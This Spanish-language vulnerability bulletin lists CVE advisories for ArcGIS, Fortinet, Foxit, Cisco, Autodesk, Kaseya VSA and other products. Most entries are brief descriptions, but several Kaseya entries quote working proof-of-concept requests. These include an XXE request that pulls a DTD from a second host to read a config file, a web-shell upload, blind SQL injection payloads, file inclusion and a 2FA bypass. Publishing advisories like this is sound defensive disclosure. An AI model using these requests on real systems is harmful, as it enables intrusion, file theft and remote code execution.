Inicio / Content / Boletín de vulnerabilidades

Boletín de vulnerabilidades

Nuevas vulnerabilidades documentadas a los productos que usted está suscrito:

Vulnerabilidad en las peticiones GET para URL en ArcGIS Server Manager (CVE-2021-29102)
Gravedad:
MediaMedia
Publication date: 11/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de tipo Server-Side Request Forgery (SSRF) en ArcGIS Server Manager versión 10.8.1 y por debajo, podría permitir a un atacante remoto, no autenticado falsificar las peticiones GET para URL arbitrarias del sistema, conllevando potencialmente a una enumeración de la red o facilitando otros ataques
Vulnerabilidad en un enlace en el navegador en ArcGIS Server Services Directory (CVE-2021-29103)
Gravedad:
MediaMedia
Publication date: 11/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de tipo Cross Site Scripting (XXS) reflejado en ArcGIS Server Services Directory versión 10.8.1 y por debajo podrían permitir a un atacante remoto convencer a un usuario en hacer clic en un enlace diseñado, el cual podría ejecutar potencialmente ejecutar código arbitrario JavaScript en el navegador del usuario
Vulnerabilidad en ArcGIS Server Services Directory (CVE-2021-29104)
Gravedad:
MediaMedia
Publication date: 11/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de tipo Cross Site Scripting (XXS) almacenado en ArcGIS Server Services Directory versión 10.8.1 y por debajo podrían permitir a un atacante remoto no autenticado pasar y almacenar cadenas maliciosas en ArcGIS Services Directory
Vulnerabilidad en la aplicación ArcGIS Server Manager (CVE-2021-29107)
Gravedad:
MediaMedia
Publication date: 10/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de tipo Cross Site Scripting (XXS) almacenado en ArcGIS Server Manager versión 10.8.1 y por debajo, podría permitir a un atacante remoto no autenticado pasar y almacenar cadenas maliciosas en la aplicación ArcGIS Server Manager
Vulnerabilidad en una carga útil en el parámetro "Page Title" en la funcionalidad "Pages" de Codoforum (CVE-2020-25876)
Gravedad:
BajaBaja
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad de tipo cross site scripting (XSS) almacenado en la funcionalidad "Pages" de Codoforum versión v5.0.2, permite a atacantes autenticados ejecutar scripts web o HTML arbitrarios por medio de una carga útil diseñada introducida en el parámetro "Page Title"
Vulnerabilidad en una carga útil en el parámetro "Content" en moziloCMS (CVE-2020-25394)
Gravedad:
BajaBaja
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad de tipo cross site scripting (XSS) almacenado en moziloCMS versión 2.0, permite a atacantes autenticados ejecutar scripts web o HTML arbitrarios por medio de una carga útil diseñada introducida en el parámetro "Content"
Vulnerabilidad en una carga útil en el campo "New Article" del plugin "Article" en CSZ CMS (CVE-2020-25392)
Gravedad:
BajaBaja
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad de tipo cross site scripting (XSS) en CSZ CMS versión 1.2.9, permite a atacantes ejecutar scripts web o HTML arbitrarios por medio de una carga útil diseñada introducida en el campo "New Article" del plugin "Article"
Vulnerabilidad en una carga útil en el campo "New Pages" bajo el módulo "Pages Content" en CSZ CMS (CVE-2020-25391)
Gravedad:
BajaBaja
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad de tipo cross site scripting en CSZ CMS versión 1.2.9, permite a atacantes ejecutar scripts web o HTML arbitrarios por medio de una carga útil diseñada introducida en el campo "New Pages" bajo el módulo "Pages Content"
Vulnerabilidad en las secuencias de comandos en el shell de comandos de FortiSandbox (CVE-2020-29014)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una ejecución concurrente usando recursos compartidos con una sincronización inapropiada ("race condition") en el shell de comandos de FortiSandbox versiones anteriores a 3.2.2, puede permitir a un atacante autenticado llevar el sistema a un estado de falta de respuesta por medio de secuencias de comandos específicamente orquestadas
Vulnerabilidad en las peticiones HTTP en la interfaz Administrativa y de Correo web en FortiMail (CVE-2021-22129)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Múltiples instancias de cálculo incorrecto del tamaño del búfer en la interfaz Administrativa y de Correo web de FortiMail versiones anteriores a 6.4.5, pueden permitir a un atacante autenticado con acceso regular al correo web desencadenar un desbordamiento del búfer y posiblemente ejecutar código o comandos no autorizados por medio de peticiones HTTP específicamente diseñadas
Vulnerabilidad en las peticiones HTTP en FortiMail (CVE-2021-24007)
Gravedad:
AltaAlta
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Múltiples vulnerabilidades de neutralización inapropiada de elementos especiales de comandos SQL en FortiMail versiones anteriores a 6.4.4, pueden permitir a un atacante no autenticado ejecutar código o comandos no autorizados por medio de peticiones HTTP específicamente diseñadas
Vulnerabilidad en la implementación del algoritmo hash digest en las URLs en FortiMail (CVE-2021-24020)
Gravedad:
AltaAlta
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una falta de paso criptográfico en la implementación del algoritmo hash digest en FortiMail versiones 6.4.0 hasta 6.4.4, y versiones 6.2.0 hasta 6.2.7, puede permitir a un atacante no autenticado manipular las URLs firmadas al añadir más datos que permitan omitir la comprobación de la firma
Vulnerabilidad en el servicio Identity-Based Encryption de FortiMail (CVE-2021-26100)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una falta de paso criptográfico en el servicio Identity-Based Encryption de FortiMail versiones anteriores a 7.0.0, puede permitir a un atacante no autenticado que intercepte los mensajes encriptados manipularlos de tal manera que haga posible la manipulación y la recuperación de textos planos
Vulnerabilidad en el comando kdbg CLI en FortiAP. (CVE-2021-26106)el comando kdbg CLI en FortiAP (CVE-2021-26106)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad neutralización inapropiada de los elementos especiales usados en comandos del Sistema Operativo en la consola de FortiAP versiones 6.4.1 hasta 6.4.5 y versiones 6.2.4 hasta 6.2.5, puede permitir a un atacante autenticado ejecutar comandos no autorizados al ejecutar el comando kdbg CLI con argumentos específicamente diseñados
Vulnerabilidad en unos permisos débiles del sistema de archivos en HMS Ewon eCatcher (CVE-2021-33214)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
21/09/2021
Descripción:
En HMS Ewon eCatcher versiones hasta 6.6.4, permisos débiles del sistema de archivos podrían permitir a usuarios maliciosos acceder a archivos que podrían conllevar a una divulgación de información confidencial, la modificación de archivos de configuración o la interrupción del funcionamiento normal del sistema
Vulnerabilidad en una clave /Size en el diccionario Trailer en Foxit Reader y PhantomPDF (CVE-2021-33792)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Foxit Reader versiones anteriores a 10.1.4 y PhantomPDF versiones anteriores a 10.1.4, presentan una escritura fuera de límites por medio de una clave /Size diseñada en el diccionario Trailer
Vulnerabilidad en la producción de firmas de documentos PDF en Foxit Reader y PhantomPDF (CVE-2021-33795)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Foxit Reader versiones anteriores a 10.1.4 y PhantomPDF versiones anteriores a 10.1.4, producen firmas de documentos PDF incorrectas porque el nombre del certificado, el propietario del documento y el autor de la firma son manejados inapropiadamente
Vulnerabilidad en el PLC en Rockwell Automation MicroLogix 1100 (CVE-2021-33012)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/07/2021
Descripción:
Rockwell Automation MicroLogix 1100, todas las versiones, permite a un atacante remoto no autenticado enviar comandos especialmente diseñados para causar un fallo en el PLC cuando el controlador es colocado en modo RUN, lo que resulta en una condición de denegación de servicio. Si es explotado con éxito, esta vulnerabilidad causará al controlador cometer un fallo cada vez que es colocado en modo RUN
Vulnerabilidad en Aruba ClearPass Policy Manager (CVE-2021-34616)
Gravedad:
MediaMedia
Publication date: 08/07/2021
Last modified:
12/07/2021
Descripción:
Se detectó una vulnerabilidad de ejecución de comandos remota arbitrarios en Aruba ClearPass Policy Manager: versiones anteriores a 6.10.0, 6.9.6 y 6.8.9. Aruba ha publicado actualizaciones para ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
Vulnerabilidad en en la interfaz XSI-Actions de Cisco BroadWorks Application Server (CVE-2021-1562)
Gravedad:
MediaMedia
Publication date: 08/07/2021
Last modified:
12/07/2021
Descripción:
Una vulnerabilidad en la interfaz XSI-Actions de Cisco BroadWorks Application Server, podría permitir a un atacante remoto autenticado acceder a información confidencial en un sistema afectado. Esta vulnerabilidad se presenta debido a una comprobación inapropiada de entrada y autorización de comandos específicos que un usuario puede ejecutar dentro de la interfaz XSI-Actions. Un atacante podría explotar esta vulnerabilidad autenticándose en un dispositivo afectado y emitiendo un conjunto específico de comandos. Una explotación con éxito podría permitir al atacante unirse a una instancia de Call Center y hacer que se le distribuyan llamadas a las que no tiene permisos para acceder desde la cola de Call Center. En el momento de la publicación, Cisco no había publicado actualizaciones que abordaran esta vulnerabilidad para Cisco BroadWorks Application Server. Sin embargo, se encuentran parches de firmware disponibles
Vulnerabilidad en la interfaz de administración basada en web de Cisco Business Process Automation (BPA) (CVE-2021-1574)
Gravedad:
AltaAlta
Publication date: 08/07/2021
Last modified:
13/09/2021
Descripción:
Múltiples vulnerabilidades en la interfaz de administración basada en web de Cisco Business Process Automation (BPA) podrían permitir a un atacante remoto y autenticado elevar privilegios a Administrador. Estas vulnerabilidades son debido a una aplicación inapropiada de la autorización para funcionalidades específicas y para el acceso a archivos de registro que contienen información confidencial. Un atacante podría explotar estas vulnerabilidades al enviar mensajes HTTP diseñados a un sistema afectado y llevando a cabo acciones no autorizadas con los privilegios de un administrador, o recuperando datos confidenciales de los registros y usándolos para hacerse pasar por un usuario legítimo con privilegios. Una explotación con éxito podría permitir al atacante elevar los privilegios a Administrador
Vulnerabilidad en una carga útil en el campo "Site Name" bajo el módulo "Site Settings" en Monstra CMS (CVE-2020-23205)
Gravedad:
BajaBaja
Publication date: 01/07/2021
Last modified:
06/07/2021
Descripción:
Una vulnerabilidad de tipo cross site scripting (XSS) almacenada en Monstra CMS versión 3.0.4, permite a atacantes ejecutar scripts web o HTML arbitrario por medio de una carga útil diseñada introducida en el campo "Site Name" bajo el módulo "Site Settings"

Otras vulnerabilidades de los productos a los que usted está suscrito, y cuya información ha sido actualizada recientemente:

Vulnerabilidad en ArcGIS Server Services Directory (CVE-2021-29105)
Gravedad:
BajaBaja
Publication date: 11/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de Cross Site Scripting (XSS) almacenada en el Directorio de Servicios de Esri ArcGIS Server versión 10.8.1 e inferior puede permitir a un atacante remoto autenticado pasar y almacenar cadenas maliciosas en el Directorio de Servicios de ArcGIS
Vulnerabilidad en un enlace en el navegador en ArcGIS Server Services Directory (CVE-2021-29106)
Gravedad:
MediaMedia
Publication date: 10/07/2021
Last modified:
30/03/2022
Descripción:
Una vulnerabilidad de Cross Site Scripting (XSS) reflejada en Esri ArcGIS Server versión 10.8.1 e inferior puede permitir que un atacante remoto pueda convencer a un usuario de que haga clic en un enlace elaborado que podría ejecutar código JavaScript arbitrario en el navegador del usuario
Vulnerabilidad en los mecanismos de protección en libxml2 (CVE-2021-3541)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
01/03/2022
Descripción:
Se ha encontrado un fallo en libxml2. Es posible un ataque de expansión exponencial de entidades omitiendo todos los mecanismos de protección existentes y conllevando a una denegación de servicio
Vulnerabilidad en el análisis de archivos PICT o TIFF en Autodesk (CVE-2021-27034)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
08/12/2021
Descripción:
Podría producirse un desbordamiento del búfer basado en la pila mientras se analizan archivos PICT, PCX, RCL o TIFF en Autodesk Design Review 2018, 2017, 2013, 2012, 2011. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario.
Vulnerabilidad en el análisis de los archivos TIFF, PDF, PICT o DWF en Autodesk (CVE-2021-27035)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/05/2022
Descripción:
Un archivo TIFF, TIF, PICT, TGA o DWF malintencionado en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ser forzado a leer más allá de los límites asignados al analizar los archivos TIFF, PICT, TGA o DWF. Esta vulnerabilidad en conjunto con otras vulnerabilidades podría llevar a la ejecución de código en el contexto del proceso actual
Vulnerabilidad en el análisis de los archivos PDF, PICT o TIFF en Autodesk (CVE-2021-27036)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/05/2022
Descripción:
Un archivo PCX, PICT, RCL, TIF, BMP, PSD o TIFF malicioso puede utilizarse para escribir más allá del búfer asignado mientras se analizan archivos PCX, PDF, PICT, RCL, BMP, PSD o TIFF. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario
Vulnerabilidad en un archivo PNG, PDF o DWF en Autodesk (CVE-2021-27037)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
12/05/2022
Descripción:
Un archivo PNG, PDF o DWF malintencionado en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ser utilizado para intentar liberar un objeto que ya ha sido liberado mientras los analiza. Esta vulnerabilidad puede ser explotada por actores maliciosos remotos para ejecutar código arbitrario
Vulnerabilidad en un archivo PDF en Autodesk (CVE-2021-27038)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
18/04/2022
Descripción:
Una vulnerabilidad de confusión de tipo en Autodesk Design Review 2018, 2017, 2013, 2012, 2011 puede ocurrir al procesar un archivo PDF maliciosamente diseñado. Un actor malicioso puede aprovechar esto para ejecutar código arbitrario
Vulnerabilidad en un archivo TIFF en Autodesk (CVE-2021-27039)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
25/04/2022
Descripción:
Un archivo TIFF y PCX malicioso puede ser forzado a leer y escribir más allá de los límites asignados cuando se analiza el archivo TIFF y PCX para el desbordamiento basado. Esta vulnerabilidad puede ser explotada para ejecutar código arbitrario
Vulnerabilidad en Kaseya VSA (CVE-2021-30119)
Gravedad:
BajaBaja
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El parámetro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la página web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el parámetro FileName de /done.asp Petición de ejemplo: `https://x.x.x.x/done.asp?FileName=";
Vulnerabilidad en Kaseya VSA (CVE-2021-30201)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripción detallada Dada la siguiente petición: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob. dtd"><data>&send;</data> ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` "> %eval; %error; ``` El servidor obtendrá este archivo XML y lo procesará, leerá el archivo c:\kaseya\kserver\kserver.ini y devolverá el contenido en la respuesta del servidor como se indica a continuación. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento '######################################################################## # Este es el archivo de configuración para el KServer. # Colóquelo en el mismo directorio que el ejecutable del KServer # Una línea en blanco o una nueva cabecera de sección válida [] termina cada sección. # Las líneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Además, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y así utilizar el sistema Kaseya para pivotar en la red local
Vulnerabilidad en Kaseya VSA (CVE-2021-30121)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
Inclusión de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` Se requiere un SessionId válido pero puede ser fácilmente obtenido a través de CVE-2021-30118
Vulnerabilidad en Kaseya VSA (CVE-2021-30120)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
Kaseya VSA antes de la versión 9.5.7 permite a los atacantes eludir el requisito de 2FA. La necesidad de usar 2FA para la autenticación en la aplicación del lado del cliente en lugar del lado del servidor y puede ser evadida usando un proxy local. De este modo, se hace inútil la 2FA. Descripción detallada --- Durante el proceso de inicio de sesión, después de que el usuario se autentique con nombre de usuario y contraseña, el servidor envía una respuesta al cliente con los booleanos MFARequired y MFAEnroled. Si el atacante ha obtenido la contraseña de un usuario y ha utilizado un proxy de intercepción (por ejemplo, Burp Suite) para cambiar el valor de MFARequered de True a False, no se solicita el segundo factor, pero el usuario sigue conectado
Vulnerabilidad en Kaseya VSA (CVE-2021-30116)
Gravedad:
AltaAlta
Publication date: 09/07/2021
Last modified:
04/04/2022
Descripción:
Kaseya VSA antes de la versión 9.5.7 permite la divulgación de credenciales, como se explotó en la naturaleza en julio de 2021. Por defecto, Kaseya VSA on premise ofrece una página de descarga donde se pueden descargar los clientes para la instalación. La URL por defecto para esta página es https://x.x.x.x/dl.asp. Cuando un atacante descarga un cliente para Windows y lo instala, se genera el archivo KaseyaD.ini (C:\aArchivos de Programa (x86)\aKaseyaXXXXXX\aKaseyaD.ini) que contiene un Agent_Guid y AgentPassword. Este Agent_Guid y AgentPassword pueden ser utilizados para iniciar sesión en dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9). Esta solicitud autentifica al cliente y devuelve una cookie sessionId que puede ser utilizada en ataques posteriores para evadir la autenticación. Problemas de seguridad descubiertos --- * La página de descarga no autenticada filtra credenciales * Las credenciales del software del agente pueden ser usadas para obtener un sessionId (cookie) que puede ser usado para servicios no destinados a ser usados por los agentes * dl.asp acepta credenciales a través de una solicitud GET * El acceso a KaseyaD.ini le da a un atacante acceso a suficiente información para penetrar la instalación de Kaseya y sus clientes. Impacto --- A través de la página /dl.asp se puede obtener suficiente información para dar a un atacante un sessionId que puede ser usado para ejecutar más ataques (semiautenticados) contra el sistema
Vulnerabilidad en Kaseya VSA (CVE-2021-30118)
Gravedad:
AltaAlta
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web para el Monitoreo y Gestión Remota Unificada (RMM) de Kaseya VSA 9.5.4.2149 y posteriormente utilizar estos archivos para ejecutar comandos asp La api /SystemTab/uploader.aspx es vulnerable a una carga de archivos arbitraria no autenticada que conduce a RCE. Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web y posteriormente utilizar estos archivos para ejecutar comandos asp. Descripción detallada --- Dada la siguiente petición: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1. 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System. Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System. Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System. Collections" %>
Vulnerabilidad en Kaseya VSA (CVE-2021-30117)
Gravedad:
MediaMedia
Publication date: 09/07/2021
Last modified:
29/04/2022
Descripción:
La llamada a la API /InstallTab/exportFldr.asp es vulnerable a una inyección SQL ciega semiautenticada basada en booleanos en el parámetro fldrId. Descripción detallada --- Dada la siguiente petición: ``` GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Donde el valor de la cookie sessionId se ha obtenido mediante CVE-2021-30116. El resultado debería ser un fallo. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` Sin embargo, cuando fldrId está configurado como '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' la petición está permitida. Solicitud: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29END%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Respuesta: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 Carpeta de exportación
Vulnerabilidad en Windows Print Spooler (CVE-2021-34527)
Gravedad:
AltaAlta
Publication date: 02/07/2021
Last modified:
20/09/2021
Descripción:
Una vulnerabilidad en la ejecución de código remota de Windows Print Spooler
Vulnerabilidad en el archivo ProxyServlet.java en el valor de la cabecera X-Host en servlet /proxy en Zimbra Collaboration Suite (CVE-2021-35209)
Gravedad:
AltaAlta
Publication date: 02/07/2021
Last modified:
20/09/2021
Descripción:
Se ha detectado un problema en el archivo ProxyServlet.java en el servlet /proxy en Zimbra Collaboration Suite versiones 8.8 anteriores a 8.8.15 Patch 23 y versiones 9.x anteriores a 9.0.0 Patch 16. El valor de la cabecera X-Host sobrescribe el valor de la cabecera Host en las peticiones proxy. El valor de la cabecera X-Host no es comprobado con la lista blanca de hosts a los que Zimbra tiene permitido hacer proxy (la configuración zimbraProxyAllowedDomains)
Vulnerabilidad en la función __cil_verify_classperms en el compilador CIL en SELinux (CVE-2021-36085)
Gravedad:
BajaBaja
Publication date: 01/07/2021
Last modified:
16/11/2021
Descripción:
El compilador CIL en SELinux versión 3.2, presenta un uso de la memoria previamente liberada en la función __cil_verify_classperms (llamado desde __verify_map_perm_classperms y hashtab_map)
Vulnerabilidad en el parámetro SenderEmail en SolarWinds Serv-U (CVE-2021-32604)
Gravedad:
BajaBaja
Publication date: 11/05/2021
Last modified:
13/05/2022
Descripción:
Share/IncomingWizard.htm en SolarWinds Serv-U antes de la versión 15.2.3 maneja mal el parámetro SenderEmail suministrado por el usuario, también conocido como "Share URL XSS"